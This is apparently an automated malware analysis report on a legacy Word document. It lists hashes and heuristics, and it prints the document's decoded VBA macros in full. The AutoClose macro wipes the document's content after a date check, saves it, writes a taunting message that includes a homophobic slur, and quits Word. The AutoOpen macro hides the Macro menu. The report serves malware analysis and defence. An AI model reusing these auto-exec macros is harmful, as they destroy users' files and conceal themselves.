Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fc6450f95168a163…

MALICIOUS

Office (OLE)

Size: 37.0 KB
Created: 2000-12-07 17:13:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 14dd141ccef415c3a1127bc8dc2776aa
SHA-1: 402754d11045c7b518ef72fb936c4c0979d53337
SHA-256: fc6450f95168a163e1d5a27053d236207b7ef2f622a63cf7331049a7582968ec
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros: an AutoClose and an AutoOpen subroutine. The AutoClose payload runs only if the current day of the month is after the 15th and the month is after October. When triggered, it deletes the document content, saves the document, types a large red message "SATÁN TE INVADE...!!!" into the document, saves it again, and then attempts to close the application. The AutoOpen macro attempts to hide the 'Macro' option from the 'Tools' menu. No external network activity or payload execution was detected.

Heuristics 4

  • VBA macros detected | medium | 2 related findings | OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro | high | OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro | high | OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1794 bytes
SHA-256: 145d2cb1e9bb77a828dea6d7f8b0f1eaac1a490223ffb235eb904eed6d7450a6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoClose"
Public Sub AutoClose()
Attribute AutoClose.VB_Description = "Cierra el documento activo de Microsoft Word"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.AutoClose"
'
' AutoClose Macro
' Closes the active Microsoft Word document
'

If WordBasic.Day(WordBasic.Now()) > 15 And WordBasic.Month(WordBasic.Now()) > 10 Then

    Selection.WholeStory
    Selection.Delete Unit:=wdCharacter, Count:=1
    ActiveDocument.Save
    Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
    Selection.Font.ColorIndex = wdRed
    Selection.Font.Size = 26
    Selection.Font.Bold = wdToggle
    Selection.Font.Name = "Comic Sans MS"
    Selection.TypeText Text:="SATÁN TE INVADE...!!!"
    Selection.TypeParagraph
    Selection.TypeParagraph
    Selection.Font.ColorIndex = wdAuto
    Selection.Font.Bold = wdToggle
    Selection.Font.Bold = wdToggle
    Selection.Font.Name = "Arial"
    Selection.Font.Size = 22
    Selection.TypeText Text:= _
        "Por maricón y maruja, por hablar mal de tus hermanos sin ver"
    Selection.TypeText Text:=" tus defectos."
    ActiveDocument.Save
    Application.Quit
End If
End Sub

Attribute VB_Name = "AutoOpen"
Public Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Abre un documento de Microsoft Word"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.NewMacros.AutoOpen"
'
' AutoOpen Macro
' Opens a Microsoft Word document
'
CommandBars("Tools").Controls("Macro").Visible = False

End Sub